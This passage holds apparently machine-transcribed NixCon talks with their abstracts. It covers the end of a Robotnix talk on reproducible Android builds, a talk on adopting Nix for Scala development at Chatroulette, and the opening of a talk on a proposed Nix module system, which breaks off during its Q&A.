certain set of files called target files, publish it up on S3 or Cachex or any other Nix binary cache and then allow users to depend on those pre-built versions of the target files but then still sign those target files with their own locally generated Android signing keys which would enable them to have a lot of the benefits of customizability still being able to control their own keys but not necessarily have to rebuild the entire thing themselves. But of course there are some obvious downsides to that approach which is that the output is quite large for every single build a bit over 3 gigabytes and every possible configuration of Robotniks produces a different output. So if you wanted to make a build for every single combination of Robotniks options you'd have an exponentially increasing number of options for every single new option you you enabled. But maybe you could do something like publish a smaller subset like maybe one or two configurations per device, maybe a minimal configuration and the more full feature configuration per device. Here's a quite a bit more speculative thing that I'm quite interested in which is that if we know that the output of Robotniks, the target files output are a bit for a bit reproducible we could do something like have multiple independent builders each of which is producing their own unsigned target files but then have them sign those with Nix binary cache keys. And there are a couple so Nix subcommands that looked quite interesting. I haven't looked into this in full detail yet but you can do things like verify that a certain number of signatures apply to a particular derivation output. So instead of trusting that a single build farm or build server this you could distribute that trust a number among a number of build servers and ensure that so long as a certain threshold of those build servers are building it reproducibly and producing the same output you can have a bit more trust that the build servers are not compromised in a way that they might produce malicious output. And then of course like I said you can you can still sign this with your own local keys and you still control the keys that determine what code runs on your device. There's the last thing which is that that build takes place in one very large derivation and that changes to that Robotniks configuration will often require a full rebuild. There are some things you can do like see cache but it's insufficient for this purpose unfortunately. But if you could share some common intermediate build products between different configurations maybe you could build things much more quickly. And I'll describe one attempt I have somewhat ambitious attempt at solving this with a set of tools. So to do that I need to briefly describe a little bit about how the Android build system works which is in the old days it was entirely make files but they've added a new build system called song or sung. I'm not exactly sure how to pronounce it based on what they call blueprint files. But they song and make files they both through this seek-hati tool they both produce ninja files which are then combined and that's what's used to actually build the whole thing. But for this I want to focus on the newer thing the song and the blueprint files. And I'll look at an example of what a blueprint file looks like. So here they're building a binary called ext to simg and it's using the cc binary song module and this is a module that builds binaries from c or c++ source code. And I'll point your attention to the sources you see it's a list of sources here it's just depending on one.c file and then a list of shared libraries and these are libraries that are defined in other blueprint files throughout the source tree. But if you squint hard enough you notice that this sort of looks like a nix expression right? So maybe if you got rid of the colons and you added equals and added semicolons and looks a little bit more like nix maybe if you assigned this to a variable and wrapped it in like a let block and added a function header where you can pass in cc binary you could turn these blueprint files into nix files that could then be evaluated by the nix package manager. And so that's what the blueprint to nix utility does. I actually modified the blueprint formatter the pretty printer to output nix files based on blueprint files. However you still have the problem that you like you have to implement that actual module the cc binary module. And so I did a partial implementation of some of the modules the cc binary and cc library modules in particular. And I actually can build some of these android modules entirely in nix so the derivation level instead of a single derivation for the whole thing you have derivations for each binary in each library. And I can build the adb and fastboot utilities using the native clang toolchain from nix packages. Even on arm64 which is quite nice because google doesn't even publish native binaries for arm64 for adb and fastboot. So already we have a bit of improvement there. And there's great benefits from using nix here. Obviously laziness is great. But the bigger thing is like the derivations only depend on the source files they explicitly reference. So you only need to download a very small portion of the overall source tree to build some of these utilities. This is in contrast to the way it normally works where you have to build download the whole thing even just to build a very small part. I'll point out this is really a proof of concept and probably not maintainable for all of android. Like if you wanted to build all of android using this it would require more than just me to to implement all of the song modules and keep them up to date. But maybe you could just do something like the host the binaries that are intended to run the host like fastboot and adb. And maybe that's something that could be in nix packages someday. And maybe this could point the way to like a potential future basal to nix or buck2nix. There's a lot of other recent build systems that operate in similar ways to song and potentially you could convert them to nix as well. Just for fun I put a lot of these derivations in the hydra and just built a ton of things to see how much would work is just for fun. But some of the final goals is like I'd like to set up some continuous integration to ensure that I'm not breaking robot nix in the future. I'd also like to have a some nix os module or something that integrates with these robot nix configurations. At the very least like to automatically set up a an update server that will host the metadata in the OTA files. And then finally I've been using this on my own phone since July of last year on my daily driver and I haven't lost any data. I haven't had to wipe or reflash this phone. I've only used the over-the-air updates. And so I intend to continue following up with the monthly releases that Google provides to keep it secure and up to date. So at this point I'm trying to work on making robot nix useful for other people and not just me. So a lot of that will have to do with documentation and if anyone is interested in at NixCon over the weekend I'd love to hear any feedback about pain points or things that I could improve on robot nix in the future. And then I'm also happy to get some very good news earlier this week which was that my proposal to the NLNet Foundation on their NGI0 initiative was recently accepted. So I'm hoping to be able to do some funded work on robot nix in the future. I think at this point in the stage we needed to find some concrete milestones but it looks like it's passed the review, the internal and external reviews process. So I'm very very excited for the future of robot nix. And of course I'd encourage you to try it out for yourself. Go check it out at github.com slash Daniel Fulmer slash Robot Nix. And I'd also encourage you to check out any of these related projects which were great inspirations for me and I owe a lot to a lot of these projects. And that's the end of my talk and I'm happy to answer any questions you might have. Okay that was Robot Nix, Build Android AOSP using Nix and this is the Q&A session with Daniel. So unfortunately since the talk was a little over the portion we probably only have time for one question and then you'll have to like sort of do that in the breakout rooms. So let me read the first one. The very first question we have is from Edith and it says given that the signing is done in a derivation do the signing keys end up in the Nix store? So that's a great question and I have the answers know that they don't end up in the Nix store but there's a couple things you have to do to ensure that that's the case. So I have two options for how you can go about doing the final signing steps. One of which generates a script like a release script that will operate outside of Nix and perform the final signing step. And the other option is within Nix but you have to enable a certain sandbox exception to enable access to your the directory containing your keys. Okay thank you. I guess that was the Q&A session I am sorry about that. So
Robotnix enables a user to build Android (AOSP) images using the Nix package manager. AOSP projects often contain long and complicated build instructions requiring a variety of tools for fetching source code and executing the build. This applies not only to Android itself, but also to projects which are to be included in the Android build, such as the Linux kernel, Chromium webview, MicroG, other external/prebuilt privileged apps, etc. Robotnix orchestrates the diverse build tools across these multiple projects using Nix, inheriting its reliability and reproducibility benefits, and consequently making the build and signing process very simple for an end-user.
10.5446/50716 (DOI)
Okay everyone, when we just decided to push the schedule forward to the third talk, I am sorry about that. So with that out of the way, our next speaker is Gabriel Vulp, and this talk is called Knicks at ChatRelate v2. So this talk is going to interest people who would like to make their job and the lives of people at the workplace better using Knicks. And they'd also like to convince their employer and colleagues that using Knicks is a good idea. So Gabriel is going to be going through their experience on how they did exactly this, working at ChatRelate. And just some factoids about Gabriel is that they are a really highly like active contributor to open source. Their GitHub handle is at G-Vulp with a total of 2.4k commits. And they're an author of a book actually, the author of practical FP and Scala, a hands-on approach. And as you've probably already told, Gabriel is a software engineer and is employed at ChatRelate currently. Okay, you can take it away, Gabriel. Paul, thank you very much for a nice introduction. And yeah, like it is a pity that you cannot see my face, but yeah, I think that it's probably better for you. So the talk today, it's going to be about two major topics. The first one is going to be about how we introduce Knicks at work and what were the necessities that we had and how we currently use it. And the second part of the talk would be more focused on the Scala ecosystem, which is a Scala for those who don't know, it's a ShaveM language. It's kind of like a hybrid functional programming language. So two major topics for this talk. Probably all the experienced Knicksers are not going to learn too much from this. The targeted audience for this talk, it's mainly every company out there writing software or making software actually. So ideally, they will be using Knicks or I can actually persuade them to give it a chance and see how it can help. So a little bit about myself, like even though I was already introduced pretty much very well, I currently work at ChatRelate. We mainly write Scala, but I consider myself a functional programmer. I wrote this book called Practical FP in Scala and I love Knicks. That's why I'm here talking to you today. So my Twitter handle and GitHub handle are going to be there in the slides for the rest of the talk. So feel free to bring me there and I'm also on the Discord chat for the rest of the conference. So how we introduce it at work and how we currently use it. It all started because we had some kind of like messy situation. I joined the company early this year and it all starts with a basic need. Basically, we have a monorepository with the whole project that it makes ChatRelate life. The backend, as I mentioned before, it's mainly written in Scala, which is a ShaveM language and we use Docker and Op-Post to run a few dependencies like Postgres and Apache Pulsar, which is at the core of what we do. We had TypeScript mainly in the front end, which I guess it runs with Node.js on NPM. I'm not very familiar with that part. I only use it sometimes. And the whole infrastructure tools and software we run mainly on Kubernetes, on an Istio service mesh and so on. And we have a bunch of people writing code using different platforms, mainly Linux and Mac OS, luckily not Windows. Yeah, so like the first day, I joined the company and I spend it all day on different meetings and talks because I join remotely and try to figure out what was all the software needed to actually run the project and all the dependencies needed for the front end, for the backend. And there's also a mix of software needed whenever you need to run the cluster as it runs in production, like if you need Kubernetes and the service mesh and all that stuff. There is a lot of stuff to take in and I think this was also my experience in previous companies not using NICS, that pretty much everybody expects you to figure out all the software that you need to run the project locally and to be productive. So that's what I found at the beginning and the idea was, okay, this is a very good use for NICS, at least let's manage the dependencies that we need to run the project locally, both for the backend and the front end and whenever we need it for infrastructure and let's see how it goes from there. So I introduced it at first, shell.NICS with a bunch of dependencies that we needed and make it work for both Darwin and Linux. Like nowadays, we have something like this. This is just a minimal example, it is a little bit much bigger what we have. We have a few other modules. We have some custom derivations that we had to build specifically for our needs. But the advantage was very clear to everybody in the team. So in order to introduce it, I only gave a small talk, share my screen and show people what is NICS and how it works and what are its benefits. So everybody was pretty much sold out on using NICS. I think it's easier when you introduce it to a group of functional programmers who actually value immutability and reproducibility. But still everybody was new to NICS and it's still accepted as part of the, you know, just give it a try. So this is what we have nowadays and this is very, it has been very good for the rest of the team and for everyone, specifically because a new developer showing in the team only needs to do a few things on day one. The only requirements are you need to have Git installed, NICS and Docker because Docker needs to run as a demon with some other permissions so we cannot provide it in our NICS shell. But other than that, this is all they need to do. Like on the first box, basically Git clone the project, enter a NICS shell and we have a shell script. It starts the whole project if you want to run it locally. So that's all they need to do and we actually encourage our team to use DRAMF. So, you know, for those who don't know DRAMF, basically enter a directory and all the dependencies declared in your shell NICS will be automatically available for you if you run these commands in the second box. So we leave this optional in the company. We don't force anyone to use DRAMF because it takes another few extra steps to set it up at first. But we encourage pretty much everyone to use it because it's, you know, like you don't need to remember to run NICS shell to then run the other commands. And sometimes, you know, where is my, the build tool commands is not available to me and it's like, oh, did you run NICS shell or not? So we avoid kind of like remembering whether a user is in a NICS, it's within a NICS shell or not. So the benefits have been huge. Like now we have reproducible development environments for both Mac users and Linux users and everybody runs the same version, the same exact version of the dependencies. There is very, very little maintenance. We update dependencies from time to time whenever the need arises. But, you know, everybody learned how to update dependencies, how to update the hash of the NICS packages version, because we have the NICS packages pinned to exact version. And like, yeah, even people got familiar with, you know, with the SHA-SHOT256, the hash, that whenever we update some custom derivations, they also need to update hash. And that's pretty much what everybody does. So for very little investment, the outcomes and the benefits have been huge for us. And so I would definitely recommend development shells. I think it's the killer feature of NICS. Just, you know, you can do a lot of things with NICS, but I think this is the killer, the best seller feature for NICS. And I think everybody out there could be leveraging this. So definitely recommend it. Another use case we have, it's since we compile our microservices using, they're all written in Scala. So the output is the shard that needs to be run by SHA-VA. So it has a SHA-VA dependency. And we generate the Docker images using, at the base Docker images to build upon using NICS as well here on the left. You can find this is the Docker NICS file. It's very, very small. But what we have, it is a guarantee that the SHA-VA version we declare in our NICS file, it's the same one that runs in production. And I mentioned this because I've been writing code on the JVM for about 10 years. And it is a very common problem. And it happens a few times that many developers, they just run different SHA-VA versions, whatever it comes installed with their system. And even if it's the same major version, you could have some issues with different minor versions. And it happens to me a couple of times in the past when a different version was running in production and we had some runtime issues. That's because we compile it with one version, but then it runs with a different version, even if it's only a change in the minor version. So with guaranteeing that the SHA-VA version you used to compile it and write code locally, we can guarantee that that's the same exact version that runs in production by creating this Docker image using NICS. So this is another benefit, so there's no more discrepancies with the SHA-VA versions that run in production and your local machine. We have a few other projects that also require some extra packages, for example, Tesseract, which is a CC++ library for doing OCR. So that's why we have this extra flag, but that's pretty much what we use it. Since we also have the shell.NICS with all the dependencies also for deployment, we actually use that in our CI build, like most main leeches running NICS. SHA and NICS command. We use GitLab runners. Our repository is hosted on GitLab. So this is all we have in our production code at the moment, but taking in consideration that it started only a few months ago, I think we've made very good progress and we're still delivering business features that are always the ones with the most priority. So that's the first part, and I think I want to encourage everyone out there not using NICS yet to give it a try, at least for development shells. I think that is a killer feature that you have reproducible development environments and you can actually hire new people and newcomers will be creating pull requests on day one without actually wasting time on figuring out what kind of dependencies they need in order to run your project. I think that is already a killer feature. We also have a few open source projects that we maintain. They are hosted on GitHub instead. I mentioned before that we use Apache Pulsar. It's a distributed message broker and we maintain two libraries, one for Scala, one for Haskell, and we use NICS also in both projects. But today I'm going to be focusing on Neutron, which is the Scala version, the Scala client, because I want to continue talking about this Scala community and NICS. Whenever people start using Scala and whenever people start trying to use NICS in a Scala project, they will do something like this, for example, like pinning the NICS packages to a specific version and just creating a shell with the Shava development kit specific version, the Shady K11 in this case, and SBT, which is the Scala build tool. It's one of the the most standard build tools in Scala. That's how people might start and actually how I started when I was learning NICS. Then we run SBT and we get a message like this and say, hold on, why is it Shava 1.8 in there when I actually want the Shady K11? This always comes as a surprise for everyone. I know it was a surprise to me as well, but it actually makes sense if you think about it. SBT gets package in NICS packages and it needs to be packaged with all its dependencies. SBT depends on the Shava version. In order to build a reproducible SBT binary, we need to know what is the version of Shava. There is a default version in NICS packages. In this case, it's Shava 1.8. Overwriting the default version is very easy. You do something like this. Basically, SBT override with a specific Shava version. We have something like this at the moment. Basically, we parameterize over the Shava version and we override the SBT version. Then we have a shell.NICS, which has also an argument for the Shava version. We have a default argument. It defaults to Shady K11, but it could be overwritten if we just pass it as an argument. Next time user run SBT, then we are welcome with SBT with a specific Shava version that we want to run. That's it. That's one thing. We also use NICS in this project on GitHub Actions. The benefits are, again, that we can use the same Shava version we use for local development in the CA build. We can actually parameterize. Since we have parameterized our shell NICS, we're taking a Shava version. We can compile and run the test for our project with multiple Shava versions. These on GitHub Actions will run three different Shops in parallel for the different Shava versions here. In this case, 8, 11, and 14. If you pay attention to the last command, which is a NICS shell at the end, it actually invokes NICS slash CI.NICS. That is basically the same as shell.NICS, except it only has SBT as a dependency because we don't need more in the CI. When it runs, it runs three parallel Shops like this. We run Apache Pulse, which is exactly what we do locally as well. Then the rest runs using NICS. I think this one is a very cool use case. Unfortunately, we cannot use it at work because we use GitLab and GitLab Runners, but I really love GitHub Actions as well. We use this for our open source projects. We use Gatchex as well. You might have seen it there in the GitHub Actions declaration. The thing is, we override the version of Shava for SBT for multiple Shava versions. If you have a file like this, an SBT.NICS, that we have, if we override it with three different Shava versions, then this will create three different SBT binaries that contain different hashes. We can actually cache these binaries to pull them from the binary cache on the CI build as well as on different machines so developers don't have to build it again. Thanks to Domain for creating Gatchex, actually three for open source projects. It's awesome. That's what we do. We don't have to build SBT and improve the CI build times. That's pretty much showing a little bit of the new Trump project that we run. I want to talk a little bit about how NICS is perceived in the Scala ecosystem and how many users are using NICS and what is the current status. Shavium languages in general don't get along very well with NICS. There's a reason why I guess the Shavium ecosystem is huge. There is another talk by the end of the day by Farid about the Shava and NICS, which I'm looking forward to hear. But recently I run this Twitter poll just focusing on the Scala community and asking the users, the Scala people whether they use NICS in their Scala projects and the results for themselves. There's more than 300 votes. Most of the people don't use it and a high number of people don't actually know what NICS is. The results are a little bit sad, but I actually want to change this. I'm trying to create more awareness of NICS in the Scala community, which is where I believe I have a bigger voice. There were a few attempts to NICS-5 Scala projects using SVT. These two projects, SVT2NICS and SBTIX, which are really ambitious. They try to create a file lock with all the dependencies, but it's actually very complicated. SVT is actually very complicated. The whole Shavium, it's complicated and Scala makes it even more complicated. Unfortunately, both projects seem to be abandoned today. Actually, I gave them a try a while ago and it's hard to get them working. They seem to work on small projects, but whenever you have a complicated setup, which is most of the time the case for Scala projects, then they fail to build and they are not being active. Hi, Gabriel. Just one moment. I just want to mention that you are actually in your Q&A time, just so you can know that. Sorry. Oh, it should be a big bit of talk. Sorry. It's okay. Since we have extra time, we can allocate an extra five minutes to that if it's okay with you. Yeah, I actually didn't get any notification for that. I'm sorry. I was in the chat. Okay, sorry now. Christine. Do you have two more minutes to finish the talk then? Sorry. Basically, the five minutes you can take for now since we have an extra five minutes to the Q&A because of the talk. Okay, sorry. I didn't see the message. I wish I could finish. Okay, you have five minutes now. Oh, it's nearly at the end. All right. You can continue your talk, actually. I hope you understood that. You can actually continue. We have extra time. Okay, I'm sorry. Okay, trying to finish it quickly. There is another person that I came across recently by Francesca Sanini. It's called SVT derivation. It is not so ambitious. It only creates a dependency hash. Like two derivations, one for the whole tree of dependencies and another derivation for the project itself. It seems to work pretty nicely. There are a few areas where it could be improved, like actually leveraging cache and stuff, but it actually works and it's actively maintained at the moment. Because of the Twitter poll results, I wanted to create more awareness of NICs in the Scala community. I started creating this guide, which is also a shi8 template. Shi8 templates are the common way to create new Scala projects. It basically tells a little bit about NICs and how it could be useful for a Scala project. All the users, all they need to do is basically run this command and they will have a project with an opinionated NICs setup so they can actually build the project using SPT derivation, as well as creating Docker images. They have all the setup for running on GitHub actions using NICs and cache as well. I'm out of time, but you can try this out at home if you're interested. Thank you all for listening and I'll be taking any questions. You have one question that I can give to you right now, if that's okay? Yeah. Okay, so from LambdaDoc on IRC, it says, how do you build Docker images from Mac machines, if you do? From Mac machines, from Darwin, I mean. I believe that's what the question is about. Mac OS. Well, I don't know. I never used Mac in my life and I will never do. Oh, okay, okay. But yeah, we used Linux and we built the Docker images in the CI build. But I think it should work on Mac OS too, but I don't know. I will need to check with my colleagues to see how they do it. But I guess they just run NICs build as well as the same way I do it. Right, right. Okay, I don't see any more questions. Wait. Okay, then I'll stop sharing. We have, I think we might have one more question. So what was the most surprising part of introducing NICs in your infrastructure? I think we have time for one more question at work. I'm sorry, your audio just went away. Could you repeat the question? Yeah, okay. So what was the most surprising part of introducing NICs at work? If you can answer that question. The most surprising part of introducing NICs, so now I'd say, well, I don't know if it's surprising. It wasn't really surprising to me because I was already using NICs for my open source projects. Then what surprised your coworkers the most maybe? I think there was no surprise. Everybody liked it and I think you only need one person to take the lead and actually promote the usage. If everybody is happy with it, then that's it. But yeah, they were, I think, don't think anybody was surprised. I think they were... Oh my God, you're incredibly lucky. Other people have much, much harder time. Yeah, I believe so. As I said before, when you introduce something that is functional, which promotes reproducibility and immutability to a group of functional programmers, I don't think there is a huge surprise because we are used to write functional programming and we know the benefits. So I think it actually fits in pretty much. Right. If it were to people who work with Python, what would have been a different situation? I think that would be a big shock. At least there would be a bigger surprise. It could be the first functional programming languages for some people. Yeah, exactly. I don't know. I don't have experience with other languages that are not functional. Okay, I think that's out of time. So thank you so much for being available early since our other speaker wasn't able to make it. You really did save us being able to do that. So we have to cut to a 25-minute break or something. No worries. Thanks, and sorry for not checking the chat. I was actually really lost. We were just looking at the slides. Oh, your slides and your presentation was great. So I think you're doing that as a help to focus. It's okay. Okay, I'll share the slides anyway on Discord and on Twitter. I will also tell you about the breakout rooms, as you might have heard before, we're going to force you into them. So your room key for your breakout room, if there's any discussion, if it isn't, I guess you can just leave, is just chat relet at this instance. Okay, no worries. Well, thank you very much for organizing this. I know it's not easy. Yep, it definitely isn't, but it's very rewarding. Okay, with that out of the way, we have some announcements. So from our moderator, we have a change in asking questions. So if you're going to ask a question during the Q&A portion, you need to join Nixcon Q&A and to ping Nbotham for your question. And I don't think we have any other announcements besides that. So yeah, we're going to be going to a five minute break. Until the next talk, we'll see you all then. Okay.
People already familiar with Nix already know its benefits but what is the best way to tell others what they are missing out? How do you convince your employer and colleagues that using Nix is a good idea? Let me tell you how I did it at Chatroulette and show you that you can easily do it at your company too. The main programming language at Chatroulette is Scala, a hybrid OOP-FP language that runs on the JVM, even though we only make use of the functional subset. We run the entire system on Kubernetes (Istio / Envoy) and deploy our microservices as Docker containers. Introducing Nix in such a big system - running in different platforms - might not seem trivial but you would never know if you never try! The talk will also touch on the current state of Nix in the Scala community. How many use Nix? How many don't know what Nix is? What can we do better? The ultimate goal of this talk is to give you the itch to at least think about introducing it at your company.
10.5446/50717 (DOI)
Okay, we have our first talk here. This talk is called Nix Modules, improving Nix's discoverability and usability. So our speaker today is none other than Ilkel Dostra. He I think he's honestly one who wouldn't really need an introduction because he is the creator of Nix. So let me go over the topic of this talk. This talk is about Nix's configuration language, but in its very powerful but suffers from a lack of discoverability, usability and consistency. In this talk, Ilkel is going to describe an experimental Nix module system that provides a consistent discoverable mechanism to write configurations such as packages and Nix with systems and show how this enables the bear user experience circles new and advanced users. And I will say Ilkel's current work setup is that he is a senior engineer at Tugayo and he joined that in 2018. Okay, great. Ilkel, take it away. All right. Can you hear me? Okay. Okay, great. Yeah. Let me start my screen sharing. So unfortunately, it appears that in Jitsi you cannot share a screen and video at the same time, at least not without the video becoming horribly blurry. So sadly, you won't be seeing me for the rest of the talk. Okay, so in any case, thank you all for that. Thank you, World of Peace, for the introduction and a big thank you to all the organizers. So yeah, of course, a slight downside compared to a physical Nix con is that I have no idea who I'm talking to, whether I might be talking to a void, but I'll just imagine that all of you are here. Yeah, so this talk is about... Ilkel, just to interrupt you one moment. It seems that at least with our infra sort of status on your slides and your screen share, I cannot actually see it. So do you think you could talk about that on and off? I'm sorry, everyone watching. Yeah. Okay, so tell me when you toggle that again and I will get a confirmation that they can see that. Okay, give me one second. I have toggled it. Can you please check the second slide? Yeah. Talk to the shows on the live stream. So now on the second slide. Okay, I believe that your screen sharing is working. You can go to the first slide and begin your talk. I'm sorry about that. It just doesn't seem to appear to me, but it is working a live stream. Okay, proceed. Okay, well, I'll monitor the comments here. So yeah, just let me know if it stops working. Okay. So yeah, this talk is about a bunch of sort of brainstorm sessions we've had, or I have had together with a couple of other people in particular, rock garboss on how to make Nix more beginner friendly and more user friendly. Now so the warning, this is quite a lot of vapor wearing this talk. So most of the things I'm describing actually do exist. There is a sort of proof of concept of the things I'm going to talk about, but it's very far from being ready for actual use, let alone merging. So this is all kind of an exploration of some ideas on how to make Nix more user friendly in various ways. But I mean, it's very far from being in a state that you can actually use. Okay, so with that having said, let's talk about what the problems are with Nix currently. So Nix is of course, it's awesome, but it's not very beginner friendly. There's a very steep learning curve. So you have to learn all these new concepts like immutability and Nix store and Nix expressions in particular. That's the big wonders is how kind of strange language that you need to learn, especially if you're not familiar with functional programming. And yeah, that's a steep learning curve. And probably a lot of people never get over that curve. So they just go away and give up. So maybe we can improve that. The second issue is that even if you are over the hurdle, you're an advanced user. There are actually a lot of things about Nix that are just not that great to use in particular. And Nix is wonderful in how possible it makes to adapt packages and configurations. So there's probably no other package manager where it's even possible to just say, I'm going to rebuild my entire system with a patched version of GCC. Or I'm going to set up a developer shell with these packages, but in some random combination with some patches applied and compiled with these versions of compiler. So I mean, that's really great about Nix. But those configuration mechanisms are for the most part not easily discoverable. So you need to basically Google about them to find out that they exist, how you use them. Yeah, another problem is there are actually a bunch of configuration mechanisms and they all work in slightly different ways. And they're often not very easy to use. So what can we do about this? So in this talk, I will discuss adding a more uniform, sorry, that was a comma. So yeah, so we're going to try to provide a more uniform and discoverable configuration mechanism, make things more discoverable from the comment line. And maybe in this gets a bit controversial, provide a simpler configuration language like Toml for simple projects. So that would make the hurdle a bit less big for beginners. So a quick look at the configuration mechanism in Nix packages and what the problem are. And so you have function arguments, the override, config, overlays, NixOS modules. So all these things have sort of grown organically over time and they're all slightly, well, they serve different use cases. But it's not clear, for instance, why for NixOS we use these modules and for packages we use this function argument style of configuration. In particular, the function argument style. That's this style where you write packages as functions that take a bunch of arguments like the dependencies and user configurable things like CUDA support. And so this is the Nix expression for blender, which you can enable CUDA support. So if you build this thing, yeah, so if you want to have blender with CUDA support, there's actually no way to find out that this option exists except by reading the source of this Nix expression. So it's not discoverable at all. And once you have discovered that this option exists, maybe by Googling about it, how do I enable CUDA in blender, you can't actually use it from the comment line. So you might think that something like Nix builds, blender, arc, CUDA support through does the right thing, but it doesn't because that argument doesn't get propagated all the way down. Other problems, there's no type checking. It's kind of ugly that it mixes user-facing configuration with dependencies. So this is not a very great configuration mechanism. Now we have dot override. I won't go into details, but dot override is another of these things that grew kind of organically. It has all sorts of problems. It's inefficient because you need to do under the hood, it calls a function twice just to get this dot override function. And it leaks memory. So if you're wondering why Nix evaluation takes multiple gigabytes, well, this is one of the reasons. Yeah, then there is the Nix packages configuration file. So you can put things like this inside a config file. But again, it's not discoverable. There's no type checking. It's not obvious how you use it from the comment line. So yeah. Now, then finally, there's overlays. Overlays are great, but the syntax is kind of mysterious. And it's also not obvious how things like nested overwrites work. So if you want to override something at top level, it's easy. If you want to override something deep down like in Python packages, it's not obvious how it works. And then there are NixOS modules. And NixOS modules are great. They're awesome. So they basically tick off most of the boxes. They're discoverable. You can just type manconfiguration.nix. They have documentation. They have types. I mean, there are some problems. They're entirely a library feature. So Nix, the comment line tool, doesn't know anything about them. So you can't easily query NixOS options from the Nix comment line or set options or do things like that. So yeah. So OK. So let's, as a solution, since NixOS modules are so great, maybe we can just use NixOS modules everywhere. So turn NixOS modules into a language feature, maybe make some improvements, like clean up the syntax and semantics and then use it everywhere. So instead of, for instance, having functions that create packages, we can have modules that create packages. So here's an example of what that looks like. So this is a module that builds Hello World. So if you know NixOS modules, then the syntax is probably familiar. Probably we would actually want to improve this syntax if we really turn this into a language feature because then you're no longer confined by having to have these weird constructs like having config as a function argument and as an attribute name. But apart from that, it should look familiar. So what this module does is it extends a bunch of other modules like standard nf. So in this modular world, we no longer have a function called standard nf.make derivation. That standard nf is a module that you can extend or inherit in your own modules. And that should, in theory, make it easier to combine modules. So for instance, if you have a package that both includes Rust code and Python code, you could just include the module for building Rust and the module for building Python. So what this module does is it says Hello World by default, but the text of the greeting is configurable at compile time. So it has a who option that you can set at build time. And that option is used in the configuration of this module. So the configuration sets a bunch of options that it inherited from the standard nf module and the package module, like the package name, the version, the build script. And that build script then generates a Hello World binary. All right. So how would you use this? Well, basically the same as how you use Nix now. And so by the way, I should mention that this is intended to be part of a flake. So modules.hello would be a flake output. So just as a flake can have packages now, it can have modules. So if you say nixrun.hello, that will build the Hello module from the flake in the current directory and run it. And that's actually equivalent to building and running modules.hello.final.derivation. And derivation is an option inherited from one of these modules that we're extending, like standard nf, that evaluates to a derivation graph. So just like in NixOS, you have a option called system.build.topLevel, which builds your entire system. Here we have an output option called derivation, which returns the derivation for your package. So the whole point was to make things discoverable. And now we have that because we have a standard structure and we have options that have descriptions and types. Actually, we don't have types yet, but we could have them just listen to NixOS module system. So yeah, we can discover via command nix list options, and that will show us all the options in this package. So for instance, this is how we discovered that this thing has a who option. And then we can override this from the comment line. So we can, for instance, say, Nix run hello, and we can override who to Nixcon. And that will build a new derivation and run it. Now you might be thinking aren't flakes supposed to be hermetic? So you can't actually override something inside a flake. So what this actually does is it on the fly, it constructs a new flake in a temporary directory that imports the flake in the current directory. So basically it generates something that looks like this. And this is what you would write yourself if you're trying to extend the module. So you could have a flake with a module named my hello that extends the hello module and sets Nixcon to who. So this is basically the replacement for the dot override or dot override derivation mechanisms. Another nice thing to mention is that we now have a documentation mechanism, a standardized documentation mechanism. So there is a command called Nix doc that given a flake generates the documentation for that flake just like cargo doc. It actually uses MD book, which is also what cargo uses. So it takes all these markdown doc strings of all the options and modules and generates documentation out of them. So the goal here is to have a standard uniform documentation mechanism for all flakes. So in the future you should be able to say Nix doc on any flake and get documentation out of them. All right, final thing to mention is the beginner friendliness. So if I go back of two slides, so this Nix expression, there's a lot of mysterious code in here, like this whole self hello stuff, this config thing over here. So that might be daunting for new users. And in fact, it's kind of unnecessary because with modules, modules are really just name value pairs like who, Nix, gone. So you don't need the whole Nix expression language just to customize a module. So the idea is you can just write a tunnel file, you still have to declare your flake dependencies, but then you can say who is Nix gone. And of course we're extending a certain module and that's it. So yeah, you could have a more user friendly syntax. And another advantage of a simpler syntax like tunnel is that this is easier to generate so we can have a command line mechanism to modify a flake. So we can just provide a command to set options or add dependencies to a Nix shell or things like that. And that's less error prone than telling new users that they need to edit a Nix expression and get the syntax exactly right. So that's the idea. All right, so that's it actually. So the next steps that we're interested in doing is, well, actually try to improve the syntax and semantics of this toy module system because right now it's an extremely bare copy of the module system that NixOS has and it has no types or merge functions or stuff like that so it's extremely bare. But yeah, so we'd like to come up with a better syntax and semantics and improve on the NixOS module system. For instance, it would be great to actually have sort of proper scoping. So for instance, a module should not be able to access options that it hasn't explicitly inherited from another module. And of course, we'd need to do a lot of experiments to see whether any new mechanism actually meets all the current use cases for the currently existing configuration mechanisms. I mean, so stuff like overlays or package sets. Yeah, we need to see whether we can actually do that. Okay, so yeah, there is a proof of concept implementation, but so it contains all these commands like NixDoc and NixListOptions. So you can actually play with it, but it's very bare at this point. And there are actually some examples that you can check out. Here is a document somewhere that has more ideas about these language changes. All right, that's it for this talk. I understand I can now answer questions, so I need to figure out where I can actually see the questions. Hi, so I will just read those off to you. You are running early, so your Q&A will actually have two extra minutes if you want. Okay, let me read the first one we have in the pad. So this is from Andy on FreeNode. It says, what is the cost of having more features that other language already built into Nix? Sorry, can you repeat that? I didn't quite catch it. Okay, I can repeat that. What is the cost of having more features that other languages already built into Nix? What is the cost? Well, obviously there is a cost in terms of we have to implement it. It makes the language more complex because of course the existing language features don't go away. But I mean, there's also the cost of not having this. So if we don't improve things like discoverability, we might lose a lot of potential users. So I would more see it from that perspective. All of this is motivated by thinking in terms of use cases. So if a user wants to set up a Nix shell, what do they need to write? And currently, if they for instance want to write a flake for their project, they have to write a lot of boilerplate codes just to get that to work. So they need to think about what would an ideal Nix expression look like. Or maybe you don't want to write an Nix expression at all and you want some other syntax for that. So yeah, I guess that's not a very good answer, but I don't actually know how to quantify the cost very well. Right. I do like that you're considering what an optimal Nix expression would look like. So the next question we have is from David AK and it is about why was TOML chosen? Do you think you can answer that? Yeah, so I mean, I'm not very married to Toml, but it exists. It's well known. So yeah, a lot of tools have support for it, editors have support for it. And I mean, you could go for Jason, that would be the simplest choice, but Jason is maybe a little bit too primitive because you can't even have things like comments in it, at least not in a nice way. But yeah, so Jason, Toml, Yammel, those would be possibilities. And then Yammel, I mean, Yammel is maybe a bit too complex. But yeah, so Toml is kind of, it's not too bare bones, so it seems like a fairly decent choice. Okay. Yeah, I think it's a fairly decent choice as well, actually. I think of those three options you mentioned, you picked the test one, but that's just my opinion. So another question from Andy, and I hope this is an okay question to ask, you can tell me if it isn't, but will I also need a Nix integration test at some point? I wonder what's wrong with just Nix build the attribute flag and then doc. Ah, okay. So that actually works. Sorry, does it work? No. So ideally at some point it would just work. So you would just have a doc option that generates the documentation for your module. But well, no, actually, that would be quite hard to do. No. Yeah, so the Nix doc command internally actually, it actually just builds a Nix expression that takes the flag as an argument. So there's actually not a lot of mysterious going on there. So you could actually do it with a Nix build and probably 